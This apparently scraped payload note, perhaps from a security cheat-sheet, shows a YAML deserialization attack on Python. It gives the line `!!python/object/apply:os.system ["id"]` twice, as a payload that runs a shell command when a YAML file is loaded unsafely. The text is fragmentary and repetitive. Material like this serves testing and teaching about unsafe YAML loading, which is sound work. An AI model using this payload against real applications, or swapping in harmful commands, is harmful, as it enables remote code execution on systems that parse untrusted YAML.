363 B
363 B
YAML Deserialization
-
RCE via Yaml execution by Python
Usage
- Example Payload insid foo.yaml gets executed via Python
!!python/object/apply:os.system ["id"]
RCE via Yaml execution by Python
!!python/object/apply:os.system ["id"]